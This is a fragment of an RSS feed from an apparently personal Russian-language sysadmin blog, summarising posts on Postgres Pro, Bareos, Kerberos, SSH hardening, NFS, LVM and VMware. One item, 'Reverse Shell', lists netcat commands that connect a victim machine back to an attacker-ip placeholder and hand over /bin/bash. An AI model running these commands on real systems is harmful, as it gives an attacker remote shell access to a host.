DROP DATABASE &amp;lt;database_name&amp;gt; WITH (FORCE);</description></item><item><title>Установка Bareos на Astra Linux SE</title><link>https://fruw.supa.dog/posts/bareos-install/</link><pubDate>Fri, 27 Jan 2023 16:08:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/bareos-install/</guid><description>Конфигурация Сервера Установка Bareos и PostgreSQL curl -s https://download.bareos.org/current/Debian_10/add_bareos_repositories.sh | bash apt update apt install postgresql bareos bareos-webui Конфигурация БД dpkg-reconfigure bareos-database-common Включение сервисов Bareos, PostgreSQL и Apache systemctl enable --now postgresql bareos-director bareos-filedaemon bareos-storage apache2 Создание пользователя для Bareos-webui и конфига клиента Веб Bareos&amp;rsquo;а находится по адресу: http://&amp;lt;bareos-ip&amp;gt;/bareos-webui/
bconsole configure add console name=&amp;lt;web-user&amp;gt; password=&amp;lt;web-pass&amp;gt; profile=webui-admin tlsenable=no configure add client name=&amp;lt;client-name&amp;gt; address=&amp;lt;client-ip&amp;gt; password=&amp;lt;client-pass&amp;gt; reload exit Бэкап определённой папки В файл /etc/bareos/bareos-dir.</description></item><item><title>Пересборка .deb пакетов</title><link>https://fruw.supa.dog/posts/linux-packages-rebuild/</link><pubDate>Tue, 24 Jan 2023 22:58:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/linux-packages-rebuild/</guid><description>Распаковка пакета Распаковка данных dpkg -x &amp;#34;&amp;lt;package&amp;gt;.deb&amp;#34; &amp;lt;folder&amp;gt; Распаковка метаданных dpkg -e &amp;#34;&amp;lt;package&amp;gt;.deb&amp;#34; &amp;lt;folder&amp;gt;/DEBIAN Сборка пакета dpkg -b &amp;lt;folder&amp;gt; &amp;#34;&amp;lt;package&amp;gt;.deb&amp;#34;</description></item><item><title>Памятка по решениям в ИБ</title><link>https://fruw.supa.dog/posts/security-solutions/</link><pubDate>Thu, 19 Jan 2023 13:00:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/security-solutions/</guid><description>EDR (Endpoint Detection and Response) Класс решений для обнаружения и изучения вредоносной активности на конечных точках: подключенных к сети рабочих станциях, серверах, устройствах Интернета вещей и так далее. В отличие от антивирусов, задача которых — бороться с типовыми и массовыми угрозами, EDR-решения ориентированы на выявление целевых атак и сложных угроз.
Примеры: SOLDR, Kaspersky EDR
UEBA (User and Entity Behavior Analytics) Класс решений для выявления киберугроз, основанная на анализе поведения пользователей, а также устройств, приложений и иных объектов в информационной системе.</description></item><item><title>Простой бэкап Postgres Pro</title><link>https://fruw.supa.dog/posts/postgres-simple-backup/</link><pubDate>Wed, 14 Dec 2022 16:48:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/postgres-simple-backup/</guid><description>Скрипт для бэкапа БД и глобальных объектов В файл /home/&amp;lt;username&amp;gt;/pg-backup.sh необходимо добавить следующие строки:
#!/usr/bin/env bash pg_dump -U &amp;lt;username&amp;gt; -h &amp;lt;pg-hostname&amp;gt; -Fc &amp;lt;db&amp;gt; --file=&amp;lt;db&amp;gt;-$(date &amp;#39;+%Y-%m-%d&amp;#39;).dump pg_dumpall -U &amp;lt;username&amp;gt; -h &amp;lt;pg-hostname&amp;gt; --globals --file=gb-$(date &amp;#39;+%Y-%m-%d&amp;#39;).dump Файл cron с запуском скрипта (каждый день в 2:00) Необходимо дописать в конец crontab -e -u &amp;lt;username&amp;gt; следующие строки:
0 2 * * * /usr/bin/env bash /home/&amp;lt;username&amp;gt;/pg-backup.sh Рестор файлов БД и глобальных объектов pg_restore -C -d postgres &amp;lt;dbname&amp;gt;-&amp;lt;date&amp;gt;.</description></item><item><title>Беспарольная аутентификация для SSH</title><link>https://fruw.supa.dog/posts/ssh-auth-by-key/</link><pubDate>Wed, 14 Dec 2022 12:04:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/ssh-auth-by-key/</guid><description>Генерация ключа ssh-keygen Копировние ключв ssh-copy-id &amp;lt;username&amp;gt;@&amp;lt;server-ip&amp;gt;</description></item><item><title>Reverse Shell</title><link>https://fruw.supa.dog/posts/reverse-shell-nc/</link><pubDate>Fri, 09 Dec 2022 15:02:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/reverse-shell-nc/</guid><description>Машина атакующего nc -lvp &amp;lt;port&amp;gt; Машина жертвы (Traditional Netcat) nc &amp;lt;attacker-ip&amp;gt; &amp;lt;port&amp;gt; -e /bin/bash Машина жертвы (OpenBSD Netcat) mkfifo /tmp/rev; nc &amp;lt;attacker-ip&amp;gt; &amp;lt;port&amp;gt; &amp;lt; /tmp/rev | /bin/bash 2&amp;gt;&amp;amp;1 | tee /tmp/rev &amp;gt; /dev/null</description></item><item><title>Аутентификация в Postgres Pro с помощью Kerberos</title><link>https://fruw.supa.dog/posts/postgres-krb5/</link><pubDate>Tue, 29 Nov 2022 16:21:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/postgres-krb5/</guid><description>Установка Kerberos и Postgres Pro Для начала, необходимо установить Postgres Pro и Kerberos. На машину с Postgres Pro Kerberos устанавливается также, как и на клиента.
Конфигурация сервера Kerberos Добавление принципиала Postgres Pro kadmin.local addprinc &amp;lt;username&amp;gt; addprinc postgres addprinc postgres/&amp;lt;pg-hostname&amp;gt; q Экспорт субъекта-службы ktutil add_entry -password -p postgres/&amp;lt;pg-hostname&amp;gt;@&amp;lt;DOMAIN.NAME&amp;gt; -k 1 -e aes256-cts-hmac-sha1-96 wkt postgres.keytab q Перенос субъекта-службы на сервер Postgres Pro Перенести keytab можно как угодно, главное, чтобы он находился в папке с конфигурационными файлами Postgres Pro.</description></item><item><title>fail2ban для SSH</title><link>https://fruw.supa.dog/posts/ssh-fail2ban/</link><pubDate>Tue, 29 Nov 2022 13:41:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/ssh-fail2ban/</guid><description>Установка пакета fail2ban apt -y install fail2ban Правило для ssh В файл /etc/fail2ban/jail.d/sshd.conf необходимо добавить следующее:
[sshd] enabled = true port = &amp;lt;ssh-port&amp;gt; filter = sshd logpath = /var/log/auth.log maxretry = 3 findtime = 300 bantime = 3600 Перезапуск сервиса fail2ban systemctl restart fail2ban</description></item><item><title>Двухфакторная аутентификация для SSH</title><link>https://fruw.supa.dog/posts/ssh-2fa-totp/</link><pubDate>Tue, 29 Nov 2022 13:35:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/ssh-2fa-totp/</guid><description>Установка пакета apt install -y openssh-server libpam-google-authenticator Правка конфига PAM В файл /etc/pam.d/common-auth необходимо добавить следующее:
auth required pam_google_authenticator.so Правка конфига ssh В файл /etc/ssh/sshd_config необходимо добавить следующее:
ChallengeResponseAuthentication yes Конфигурация аутентификации Следующая команда сконфигурирует TOTP. Запускать команду следует от имени того пользователя, к которому будет инициализированно подключение.
google-authenticator Управление факторами (необязательно) Для запроса ключа при аутентификации необходимо в файл /etc/ssh/sshd_config добавить следующее:
AuthenticationMethods publickey,password publickey,keyboard-interactive Для отключения запроса пароля при аутентификации необходимо в файле /etc/pam.</description></item><item><title>Установка и конфигурация Kerberos на Linux</title><link>https://fruw.supa.dog/posts/linux-krb5/</link><pubDate>Tue, 29 Nov 2022 13:07:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/linux-krb5/</guid><description>Конфигурация сервера Установка пакетов apt -y install krb5-kdc krb5-admin-server Конфигурация клиента Установка пакетов apt -y install krb5-user libpam-krb5 Общая конфигурация На сервере и клиенте надо проделать следующие шаги:
Смена hostname hostnamectl set-hostname &amp;lt;hostname&amp;gt; Правка файла hosts Вместо правки файла /etc/hosts можно поднять DNS-сервер и сделать записи там.
&amp;lt;server-ip&amp;gt; &amp;lt;server-name.domain.name&amp;gt; &amp;lt;server-name&amp;gt; &amp;lt;client-ip&amp;gt; &amp;lt;client-name.domain.name&amp;gt; &amp;lt;client-name&amp;gt; Редактирование конфига Kerberos В /etc/krb5.conf необходимо добавить данные а реалме и kdc:
[libdefaults] default_realm = &amp;lt;DOMAIN.NAME&amp;gt; [realms] &amp;lt;DOMAIN.</description></item><item><title>Соединение по TLS в Postgres Pro</title><link>https://fruw.supa.dog/posts/postgres-tls/</link><pubDate>Mon, 28 Nov 2022 20:25:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/postgres-tls/</guid><description>Создание сертификата В этом посте я буду использовать самоподписанный сертификат, но сертификат от Let&amp;rsquo;s Encrypt тоже подойдёт. Сертификат и ключ желательно держать в той же папке, где лежат конфиги Postgres Pro.
openssl req -x509 -newkey rsa:4096 -nodes -keyout &amp;lt;key&amp;gt;.key -out &amp;lt;cert&amp;gt;.pem -sha256 -days 365 Включение TLS В файл /var/lib/pgpro/std-*/data/postgresql.conf необходимо добавить следующие строки:
ssl = on ssl_cert_file = &amp;#39;&amp;lt;cert&amp;gt;.pem&amp;#39; ssl_key_file = &amp;#39;&amp;lt;key&amp;gt;.pem&amp;#39; listen_addresses = &amp;#39;localhost, &amp;lt;master-ip&amp;gt;&amp;#39; Разрешение доступа через TLS В файл /var/lib/pgpro/std-*/data/pg_hba.</description></item><item><title>Памятка по команде ip</title><link>https://fruw.supa.dog/posts/ip-command/</link><pubDate>Fri, 25 Nov 2022 19:17:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/ip-command/</guid><description>Показать все интерфейсы ip a ip l Показать информацию по конкретному интерфейсу ip a show &amp;lt;interface&amp;gt; ip l show &amp;lt;interface&amp;gt; Изменить статус сетевого интерфейса ip l set &amp;lt;interface&amp;gt; down ip l set &amp;lt;interface&amp;gt; up Добавить или удалить адрес ip a add &amp;lt;ip-address/mask&amp;gt; dev &amp;lt;interface&amp;gt; ip a add brd &amp;lt;ip-address/mask&amp;gt; dev &amp;lt;interface&amp;gt; ip a del &amp;lt;ip-address&amp;gt; dev &amp;lt;interface&amp;gt;</description></item><item><title>Установка и конфигурация NFS-сервера на Linux</title><link>https://fruw.supa.dog/posts/linux-nfs/</link><pubDate>Fri, 25 Nov 2022 17:57:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/linux-nfs/</guid><description>Настройка NFS-сервера Установка пакета apt -y install nfs-kernel-server Создание каталога, который будет расшарен mkdir /nfs chmod 777 /nfs Разрешение сетевого доступа В файл /etc/exports необходимо добавить следующую строку:
/nfs &amp;lt;client-ip&amp;gt;(rw,sync,no_root_squash,no_subtree_check) Настройка NFS-клиента Установка пакета apt -y install nfs-common Запуск службы systemctl enable --now rpcbind Автомонитрование В файл /etc/fstab необходимо добавить следующую строку:
&amp;lt;server-ip&amp;gt;:/nfs /nfs nfs defaults 0 0</description></item><item><title>Настройка физической репликации Postgres Pro</title><link>https://fruw.supa.dog/posts/postgres-replication/</link><pubDate>Fri, 25 Nov 2022 16:51:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/postgres-replication/</guid><description>Установка Postgres Pro Процесс установки описан в этом посте.
Потоковая репликация Про различия в реализациях репликаций можно почитать вот здесь.
Конфигурация master Создание пользователя для репликации su - postgres psql -c &amp;#34;CREATE ROLE repuser WITH REPLICATION LOGIN ENCRYPTED PASSWORD &amp;#39;&amp;lt;password&amp;gt;&amp;#39;;&amp;#34; Разрешение подключения для slave Дописываем в конец файла /var/lib/pgpro/std-*/data/pg_hba.conf:
host replication repuser &amp;lt;slave-ip&amp;gt;/32 md5 Реконфигурация В файл /var/lib/pgpro/std-*/data/postgresql.conf необходимо добавить следующие строки:
listen_addresses = &amp;#39;localhost, &amp;lt;master-ip&amp;gt;&amp;#39; wal_level = hot_standby archive_mode = on archive_command = &amp;#39;cd .</description></item><item><title>Установка Postgres Pro на Astra Linux SE</title><link>https://fruw.supa.dog/posts/postgres-pro-astra-se/</link><pubDate>Fri, 25 Nov 2022 16:20:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/postgres-pro-astra-se/</guid><description>Добавление репозитория apt -y install gnupg wget -O - http://repo.postgrespro.ru/keys/GPG-KEY-POSTGRESPRO | apt-key add - echo &amp;#34;deb http://repo.postgrespro.ru/pgpro-14/astra-smolensk/1.7 1.7_x86-64 main&amp;#34; &amp;gt; /etc/apt/sources.list.d/pgpro.list Установка пакета apt update apt -y install postgrespro-std-14 systemd /opt/pgpro/std-14/bin/pg-setup service enable --now ln -s /lib/systemd/system/postgrespro-std-14.service /etc/systemd/system/postgresql.service Обновление путей /opt/pgpro/std-14/bin/pg-wrapper links update Смена пароля postgres su - postgres psql -c &amp;#34;ALTER USER postgres PASSWORD &amp;#39;&amp;lt;password&amp;gt;&amp;#39;;&amp;#34;</description></item><item><title>Настройка сети в Linux</title><link>https://fruw.supa.dog/posts/linux-network/</link><pubDate>Fri, 25 Nov 2022 15:34:46 +0500</pubDate><guid>https://fruw.supa.dog/posts/linux-network/</guid><description>Настройка DNS и домена В файл /etc/resolv.conf необходимо добавить следующие строки:
search &amp;lt;domain&amp;gt; nameserver &amp;lt;dns-server&amp;gt; Статика В файл /etc/network/interfaces.d/&amp;lt;interface&amp;gt; необходимо добавить следующие строки:
auto &amp;lt;interface&amp;gt; iface &amp;lt;interface&amp;gt; inet static address &amp;lt;ip-address&amp;gt; netmask &amp;lt;netmask&amp;gt; gateway &amp;lt;gateway&amp;gt; DHCP В файл /etc/network/interfaces.d/&amp;lt;interface&amp;gt; необходимо добавить следующие строки:
auto &amp;lt;interface&amp;gt; iface &amp;lt;interface&amp;gt; inet dhcp</description></item><item><title>Сброс времени при перезагрузке в VMware ESXi/vSphere</title><link>https://fruw.supa.dog/posts/vmware-restart-date/</link><pubDate>Fri, 25 Nov 2022 15:18:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/vmware-restart-date/</guid><description>Изменение скрипта В файл /etc/rc.local.d/local.sh необходимо добавить следующее:
#!/bin/sh ++group=host/vim/vmvisor/boot esxcli system time set --day=20 --month=3 --year=2022 --hour=10 --min=0 --sec=0 exit 0</description></item><item><title>Включение буфера VM в VMware ESXi/vSphere</title><link>https://fruw.supa.dog/posts/vmware-clipboard/</link><pubDate>Fri, 25 Nov 2022 15:08:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/vmware-clipboard/</guid><description>Изменение конфига В файл /etc/vmware/config необходимо добавить следующее:
vmx.fullpath = &amp;#34;/bin/vmx&amp;#34; isolation.tools.copy.disable=&amp;#34;FALSE&amp;#34; isolation.tools.paste.disable=&amp;#34;FALSE&amp;#34;</description></item><item><title>Памятка по LVM</title><link>https://fruw.supa.dog/posts/lvm-base-commands/</link><pubDate>Fri, 25 Nov 2022 13:58:10 +0500</pubDate><guid>https://fruw.supa.dog/posts/lvm-base-commands/</guid><description>Установка пакекта apt -y install lvm2 Создание pvcreate /dev/sda vgcreate vg-name /dev/sda lvcreate -L 10G -n lv-name vg-name Изменение vgextend vg /dev/sdb lvresize -rL +1G /dev/vg-name/lv-name lvresize -rl +100%FREE /dev/vg-name/lv-name Просмотр pvs vgs lvs</description></item></channel></rss>